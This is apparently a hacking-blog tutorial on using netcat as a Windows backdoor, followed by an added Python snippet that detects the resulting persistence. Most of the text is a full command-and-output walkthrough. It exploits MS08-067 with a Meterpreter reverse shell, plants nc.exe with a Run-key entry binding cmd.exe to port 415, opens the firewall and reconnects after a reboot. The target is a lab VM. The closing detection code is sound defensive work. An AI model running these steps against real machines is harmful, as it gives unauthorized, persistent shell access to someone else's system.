[metasploit] netcat as backdoor

Netcat is a tool that can read and write data over TCP and UDP network connections. Netcat is used as a port scanner, as a backdoor (connect back), as a port redirector, for opening connections, and for other interesting things. 😀 For more details about netcat, search Google.

Now let's try netcat as a backdoor.

================================
Victim : Windows Xp sp2 (vmware)
IP : 172.16.125.128
port : 445 open
================================

Exploit the target

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.16.125.128
RHOST => 172.16.125.128
msf exploit(ms08_067_netapi) > set LHOST 172.16.125.1
LHOST => 172.16.125.1
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.125.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 172.16.125.128
[*] Meterpreter session 1 opened (172.16.125.1:4444 -> 172.16.125.128:1034) at 2010-09-01 23:47:28 +0000

In the meterpreter session, upload netcat & create a value in the target's registry so that netcat always runs at system startup.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\windows\\system32
[*] uploading  : /pentest/windows-binaries/tools/nc.exe -> c:\windows\system32
[*] uploaded   : /pentest/windows-binaries/tools/nc.exe -> c:\windows\system32\nc.exe
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v valuename -d 'C:\windows\system32\nc.exe -Ldp 415 -e cmd.exe'
Successful set valuename.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v valuename
Key: HKLM\software\microsoft\windows\currentversion\run
Name: valuename
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 415 -e cmd.exe

From a shell session, configure the firewall with netsh so that it allows remote connections on the port we chose, "415".

meterpreter > execute -f cmd.exe -i
Process 1944 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall add portopening TCP 415 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 415 "Service Firewall" ENABLE ALL
Ok.

Let's check whether port 415 is now listed & has status Enable.

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
415    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
1900   UDP       Enable   SSDP Component of UPnP Framework
2869   TCP       Enable   UPnP Framework over TCP

Above, port 415 is enabled; now let's try restarting the target machine.

C:\WINDOWS\system32>shutdown -r -t 0

Time to connect remotely using netcat, hehehe, we can get into the target machine without an exploit, because we already have a back door. 😀

root@bt:~# nc 172.16.125.128 415
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>net user
net user

User accounts for \\VICTIM

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SUPPORT_388945a0
The command completed successfully.


C:\Documents and Settings\Administrator>
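From the defender's side, the persistence set up above leaves two artifacts that are easy to correlate: a Run-key value that launches nc.exe with a bind/exec option, and a firewall opening on the same port. The following is an added example (not code from the original post) that parses constructed samples of `netsh firewall show portopening` output and of Run-key values, flags openings outside a baseline and Run entries that bind a shell to a socket, and pairs them by port; the baseline set and the sample data are assumptions.

```python
import re

# Constructed sample of `netsh firewall show portopening` output (Standard profile),
# modelled on the transcript above; not captured from a real host.
NETSH_OUTPUT = """\
Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
415    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
"""

# Constructed sample of HKLM\...\CurrentVersion\Run values as (name, data) pairs.
RUN_VALUES = [
    ("ctfmon", "C:\\WINDOWS\\system32\\ctfmon.exe"),
    ("valuename", "C:\\windows\\system32\\nc.exe -Ldp 415 -e cmd.exe"),
]

# Assumed baseline: openings an XP SP2 host with file sharing is expected to have.
BASELINE_PORTS = {("TCP", 139), ("TCP", 445), ("UDP", 137), ("UDP", 138)}

PORT_LINE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.*)$")
# A netcat/ncat command line whose -e or -c option hands the socket to a shell.
SHELL_BIND = re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-[A-Za-z]*[ec]\s+(?:cmd|command|powershell)", re.I)

def unexpected_openings(netsh_text, baseline=BASELINE_PORTS):
    """Return (port, proto, name) for enabled openings that are not in the baseline."""
    found = []
    for line in netsh_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "Enable":
            port, proto = int(m.group(1)), m.group(2)
            if (proto, port) not in baseline:
                found.append((port, proto, m.group(4).strip()))
    return found

def suspicious_run_values(values):
    """Return Run-key (name, data) pairs whose command binds a shell to a socket."""
    return [(n, d) for n, d in values if SHELL_BIND.search(d)]

def correlate(netsh_text, values):
    """Pair each suspicious Run value with the unexpected firewall opening on its listen port."""
    hits = []
    for name, data in suspicious_run_values(values):
        m = re.search(r"-[A-Za-z]*p\s+(\d+)", data)  # netcat's -p <port>, possibly bundled as -Ldp
        port = int(m.group(1)) if m else None
        for p, proto, fw_name in unexpected_openings(netsh_text):
            if p == port:
                hits.append({"run_value": name, "port": p, "proto": proto, "fw_rule": fw_name})
    return hits
```

On a live host the same two inputs come from `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and `netsh firewall show portopening`; a hit where a Run value and a firewall rule agree on a port is a strong persistence indicator even when the rule carries an innocuous name like "Service Firewall".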

Good Luck !!
